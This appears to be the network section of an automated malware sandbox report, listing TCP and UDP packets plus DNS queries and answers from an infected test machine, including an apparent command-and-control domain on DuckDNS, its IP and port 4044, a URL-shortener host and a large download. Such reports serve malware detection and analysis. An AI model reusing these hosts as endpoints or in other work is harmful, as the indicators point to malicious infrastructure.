                                                                                                                                                                                  Dec 3, 2024 14:01:55.222203970 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225379944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225403070 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225414991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225449085 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225627899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225640059 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225651979 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225683928 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226314068 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226358891 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226403952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227499962 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227560997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227576017 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228559017 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228600979 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228938103 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229624033 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229664087 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229727030 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.230715990 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.230762959 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.231054068 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232276917 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232325077 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232383966 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233320951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233351946 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233365059 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234324932 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234373093 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234431028 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235177040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235222101 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235275984 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236269951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236320019 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236321926 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237354040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237397909 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237497091 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238461971 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238509893 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238559008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239581108 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239629030 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239667892 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240660906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240711927 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240732908 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241734028 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241782904 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241832972 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242836952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242887020 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242985964 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.243935108 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.243998051 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.244030952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.244972944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.245018959 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388490915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388571978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388628960 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388919115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388998985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.389040947 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390048027 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390235901 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390281916 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391165018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391263008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391302109 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392230034 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392481089 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392522097 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393393993 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393495083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393533945 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394501925 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394654036 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394697905 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395648956 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395793915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395843029 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396755934 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396873951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396910906 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397717953 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397874117 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397913933 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398926973 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398947954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398977041 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400033951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400110006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400161982 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401103020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401243925 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401285887 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402168989 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402247906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402287960 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.403254986 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.403392076 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.403433084 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.404351950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.404479980 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.404522896 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.405430079 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.405508995 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.405544996 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.406646013 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.406805038 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.406843901 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.407660961 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.407771111 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.407813072 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.408694983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.408850908 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.408888102 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.409801960 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.409917116 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.409960032 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.410919905 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.411029100 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.411082983 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.412031889 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.412131071 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.412179947 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.413173914 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.413252115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.413300991 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.414277077 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.414427996 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.414475918 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.415340900 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.415492058 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.415546894 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.416433096 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.416527987 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.416575909 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.417633057 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.417702913 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.417749882 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.418759108 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.418771982 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.418806076 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.419888020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.420006990 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.420088053 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.420878887 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.420954943 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.421001911 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.421921015 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.422068119 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.422106028 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.423105001 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.423208952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.423249006 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.424189091 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.424305916 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.424351931 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.425328016 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.425458908 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.425498009 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.426393032 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.426450014 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.426490068 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.427428961 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.427637100 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.427680016 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.428647041 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.428787947 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.428828001 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.429722071 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.429790974 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.429831982 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.430771112 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.430880070 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.430923939 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.431983948 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.431997061 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.432044029 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.432966948 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.433053970 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.433099985 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.434032917 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.434170008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.434216976 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.435173988 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.435311079 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.435370922 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.436218023 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.650738001 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.698709011 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:02:10.262788057 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:02:10.265464067 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:02:10.385512114 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:02:40.441361904 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:02:40.442831993 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:02:40.562999010 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:02:51.222239971 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:02:51.576814890 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:02:52.278812885 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:02:53.682799101 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:02:56.381652117 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:03:01.685602903 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:03:10.920756102 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:03:10.937508106 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:03:11.058032036 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:03:12.278034925 CET4918080192.168.2.22178.237.33.50

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 3, 2024 14:00:52.957813978 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:00:53.301515102 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.431154966 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:00:57.843759060 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.862140894 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:00:57.997905016 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.486355066 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:18.522454977 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:18.661891937 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:18.795052052 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.795325994 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:19.167767048 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.168683052 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:19.303076982 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:32.610449076 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:32.857302904 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:41.472800016 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:41.809935093 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.513333082 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:44.753160954 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.753546000 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                  Dec 3, 2024 14:01:44.993408918 CET53527818.8.8.8192.168.2.22

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 3, 2024 14:00:52.957813978 CET192.168.2.228.8.8.80x802Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:00:57.431154966 CET192.168.2.228.8.8.80xec76Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:00:57.862140894 CET192.168.2.228.8.8.80xec76Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.486355066 CET192.168.2.228.8.8.80xb137Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.522454977 CET192.168.2.228.8.8.80x4affStandard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.661891937 CET192.168.2.228.8.8.80xf578Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.795325994 CET192.168.2.228.8.8.80x4affStandard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:19.168683052 CET192.168.2.228.8.8.80x4affStandard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.610449076 CET192.168.2.228.8.8.80x37b3Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.857302904 CET192.168.2.228.8.8.80x849Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:41.472800016 CET192.168.2.228.8.8.80x43edStandard query (0)apamanollonan.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:44.513333082 CET192.168.2.228.8.8.80x5e5fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:44.753546000 CET192.168.2.228.8.8.80x5e5fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 3, 2024 14:00:53.301515102 CET8.8.8.8192.168.2.220x802No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:00:57.843759060 CET8.8.8.8192.168.2.220xec76No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:00:57.997905016 CET8.8.8.8192.168.2.220xec76No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.648015022 CET8.8.8.8192.168.2.220xb137No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.795052052 CET8.8.8.8192.168.2.220x4affNo error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:18.821018934 CET8.8.8.8192.168.2.220xf578No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:19.167767048 CET8.8.8.8192.168.2.220x4affNo error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:19.303076982 CET8.8.8.8192.168.2.220x4affNo error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET8.8.8.8192.168.2.220x37b3No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET8.8.8.8192.168.2.220x37b3No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET8.8.8.8192.168.2.220x37b3No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET8.8.8.8192.168.2.220x37b3No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:32.831568956 CET8.8.8.8192.168.2.220x37b3No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:33.115714073 CET8.8.8.8192.168.2.220x849No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:41.809935093 CET8.8.8.8192.168.2.220x43edNo error (0)apamanollonan.duckdns.org31.13.224.72A (IP address)IN (0x0001)false
